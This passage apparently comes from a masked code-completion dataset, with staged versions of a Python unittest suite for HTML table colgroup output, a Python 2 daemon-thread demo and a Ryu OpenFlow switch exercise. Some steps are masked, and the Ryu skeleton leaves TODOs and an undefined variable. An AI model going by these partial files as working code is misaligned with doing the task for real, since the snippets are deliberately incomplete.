"step-1": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n <mask token>\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col 
/></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col 
/></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col 
/></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom Spreadsheet.HTML import Table\n\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate(), 'colgroup present from generate()')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>'\n , gen.generate({'tgroups': 2}),\n 'colgroup present from generate() with tgroups')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None}), 'colgroup can be overriden')\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': 1}), 'colgroup yields no-op if scalar')\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{'span': 1, 'color': 'red'}, {\n 'span': 2, 'color': 'blue'}]}), 'can specify multiple colgroups')\n\n def test_col(self):\n return\n data = [['a', 'b', 'c'], [1, 2, 3], [4, 5, 6]]\n gen = Table({'data': data, 'colgroup': {'span': 3, 'width': 100},\n 'attr_sort': 1})\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col 
/></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': {}}), 'colgroup wraps col')\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': [{}, {}, {}]}),\n 'colgroup wraps multiple cols')\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': None, 'col': {}}),\n 'colgroup can be overriden when col is present too')\n gen = Table({'data': data, 'col': [{}, {}, {}]})\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': {}}),\n 'multiple cols against single colgroup')\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'col': None, 'colgroup': [{}, {}, {}]}),\n 'no cols against multiple colgroups')\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>'\n , gen.generate({'colgroup': [{}, {}, {}]}),\n 'multiple cols against multiple colgroups')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "import unittest\nfrom Spreadsheet.HTML import Table\n\nclass TestColGroup(unittest.TestCase):\n\n def test_colgroup(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate(),\n \"colgroup present from generate()\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\" /><thead><tr><th>a</th><th>b</th><th>c</th></tr></thead><tfoot><tr><td>4</td><td>5</td><td>6</td></tr></tfoot><tbody><tr><td>1</td><td>2</td><td>3</td></tr></tbody></table>',\n gen.generate( { 'tgroups': 2 } ),\n \"colgroup present from generate() with tgroups\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None } ),\n \"colgroup can be overriden\"\n )\n\n self.assertEqual(\n '<table><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': 1 } ),\n \"colgroup yields no-op if scalar\"\n )\n\n self.assertEqual(\n '<table><colgroup color=\"red\" span=\"1\" /><colgroup color=\"blue\" span=\"2\" /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [ { 'span': 1, 'color': 'red' }, { 'span': 2, 'color': 'blue' } ] } ),\n \"can specify multiple colgroups\"\n )\n\n\n def test_col(self):\n return\n\n data = [\n ['a','b','c'],\n [1,2,3],\n [4,5,6],\n ]\n\n gen = Table( { 'data': data, 'colgroup': { 'span': 3, 'width': 100 }, 'attr_sort': 1 } );\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col 
/></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': {} } ),\n \"colgroup wraps col\"\n )\n\n self.assertEqual(\n '<table><colgroup span=\"3\" width=\"100\"><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': [{},{},{}] } ),\n \"colgroup wraps multiple cols\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': None, 'col': {} } ),\n \"colgroup can be overriden when col is present too\"\n )\n\n\n gen = Table( { 'data': data, 'col': [{},{},{}] } );\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': {} } ),\n \"multiple cols against single colgroup\"\n )\n\n self.assertEqual(\n '<table><colgroup /><colgroup /><colgroup /><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'col': None, 'colgroup': [{},{},{}] } ),\n \"no cols against multiple colgroups\"\n )\n\n self.assertEqual(\n '<table><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><colgroup><col /><col /><col /></colgroup><tr><th>a</th><th>b</th><th>c</th></tr><tr><td>1</td><td>2</td><td>3</td></tr><tr><td>4</td><td>5</td><td>6</td></tr></table>',\n gen.generate( { 'colgroup': [{},{},{}] } ),\n \"multiple cols against multiple colgroups\"\n )\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
# -*- coding: utf-8 -*-
import threading
import time
def work():
i = 0
while i < 10:
print 'I am working..'
time.sleep(0.5)
i += 1
t = threading.Thread(target=work)
# Daemon 설정
#t.setDaemon(True)
t.daemon = True # 혹인 이렇게도 가능
t.start()
print 'main thread finished'
|
normal
|
{
"blob_id": "f77df47fdb72ba50331b8b5d65984efaec474057",
"index": 4049,
"step-1": "# -*- coding: utf-8 -*-\n\nimport threading\nimport time\n\ndef work():\n i = 0\n while i < 10:\n print 'I am working..'\n time.sleep(0.5)\n i += 1\n\nt = threading.Thread(target=work)\n# Daemon 설정\n#t.setDaemon(True) \nt.daemon = True # 혹인 이렇게도 가능\nt.start()\n\nprint 'main thread finished'\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
class SimpleSwitch(app_manager.RyuApp):
<|reserved_special_token_0|>
<|reserved_special_token_0|>
<|reserved_special_token_0|>
print('PACKET_OUT...')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
<|reserved_special_token_0|>
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
<|reserved_special_token_1|>
<|reserved_special_token_0|>
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
<|reserved_special_token_1|>
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(in_port=in_port, dl_dst=
haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(datapath=datapath, match=
match, cookie=0, command=ofproto.OFPFC_ADD, idle_timeout=0,
hard_timeout=0, priority=ofproto.OFP_DEFAULT_PRIORITY, flags=
ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',
dpid, src, dst, msg.in_port)
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
if out_port != ofproto.OFPP_FLOOD:
self.logger.info(
'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '
, dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
print('PACKET_OUT...')
<|reserved_special_token_1|>
from ryu.base import app_manager
from ryu.controller import ofp_event
from ryu.controller.handler import MAIN_DISPATCHER
from ryu.controller.handler import set_ev_cls
from ryu.ofproto import ofproto_v1_0
from ryu.lib.mac import haddr_to_bin
from ryu.lib.packet import packet
from ryu.lib.packet import ethernet
from ryu.lib.packet import ether_types
class SimpleSwitch(app_manager.RyuApp):
# TODO define OpenFlow 1.0 version for the switch
# add your code here
def __init__(self, *args, **kwargs):
super(SimpleSwitch, self).__init__(*args, **kwargs)
self.mac_to_port = {}
def add_flow(self, datapath, in_port, dst, src, actions):
ofproto = datapath.ofproto
match = datapath.ofproto_parser.OFPMatch(
in_port=in_port,
dl_dst=haddr_to_bin(dst), dl_src=haddr_to_bin(src))
mod = datapath.ofproto_parser.OFPFlowMod(
datapath=datapath, match=match, cookie=0,
command=ofproto.OFPFC_ADD, idle_timeout=0, hard_timeout=0,
priority=ofproto.OFP_DEFAULT_PRIORITY,
flags=ofproto.OFPFF_SEND_FLOW_REM, actions=actions)
# TODO send modified message out
# add your code here
@set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)
def _packet_in_handler(self, ev):
msg = ev.msg
datapath = msg.datapath
ofproto = datapath.ofproto
pkt = packet.Packet(msg.data)
eth = pkt.get_protocol(ethernet.ethernet)
if eth.ethertype == ether_types.ETH_TYPE_LLDP:
# ignore lldp packet
return
if eth.ethertype == ether_types.ETH_TYPE_IPV6:
# ignore ipv6 packet
return
dst = eth.dst
src = eth.src
dpid = datapath.id
self.mac_to_port.setdefault(dpid, {})
self.logger.info("packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s", dpid, src, dst, msg.in_port)
# learn a mac address to avoid FLOOD next time.
self.mac_to_port[dpid][src] = msg.in_port
if dst in self.mac_to_port[dpid]:
out_port = self.mac_to_port[dpid][dst]
else:
out_port = ofproto.OFPP_FLOOD
# TODO define the action for output
# add your code here
# install a flow to avoid packet_in next time
if out_port != ofproto.OFPP_FLOOD:
self.logger.info("add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] ", dpid, src, dst, msg.in_port, out_port)
self.add_flow(datapath, msg.in_port, dst, src, actions)
data = None
if msg.buffer_id == ofproto.OFP_NO_BUFFER:
data = msg.data
# TODO define the OpenFlow Packet Out
# add your code here
print ("PACKET_OUT...")
|
flexible
|
{
"blob_id": "86d032a3cd67118eb46073c996f1c9a391f8dfe0",
"index": 1608,
"step-1": "<mask token>\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n <mask token>\n <mask token>\n <mask token>\n print('PACKET_OUT...')\n",
"step-2": "<mask token>\n\n\nclass SimpleSwitch(app_manager.RyuApp):\n\n def __init__(self, *args, **kwargs):\n super(SimpleSwitch, self).__init__(*args, **kwargs)\n self.mac_to_port = {}\n <mask token>\n\n @set_ev_cls(ofp_event.EventOFPPacketIn, MAIN_DISPATCHER)\n def _packet_in_handler(self, ev):\n msg = ev.msg\n datapath = msg.datapath\n ofproto = datapath.ofproto\n pkt = packet.Packet(msg.data)\n eth = pkt.get_protocol(ethernet.ethernet)\n if eth.ethertype == ether_types.ETH_TYPE_LLDP:\n return\n if eth.ethertype == ether_types.ETH_TYPE_IPV6:\n return\n dst = eth.dst\n src = eth.src\n dpid = datapath.id\n self.mac_to_port.setdefault(dpid, {})\n self.logger.info('packet in DPID:%s MAC_SRC:%s MAC_DST:%s IN_PORT:%s',\n dpid, src, dst, msg.in_port)\n self.mac_to_port[dpid][src] = msg.in_port\n if dst in self.mac_to_port[dpid]:\n out_port = self.mac_to_port[dpid][dst]\n else:\n out_port = ofproto.OFPP_FLOOD\n if out_port != ofproto.OFPP_FLOOD:\n self.logger.info(\n 'add flow s:DPID:%s Match:[ MAC_SRC:%s MAC_DST:%s IN_PORT:%s ], Action:[OUT_PUT:%s] '\n , dpid, src, dst, msg.in_port, out_port)\n self.add_flow(datapath, msg.in_port, dst, src, actions)\n data = None\n if msg.buffer_id == ofproto.OFP_NO_BUFFER:\n data = msg.data\n print('PACKET_OUT...')\n",
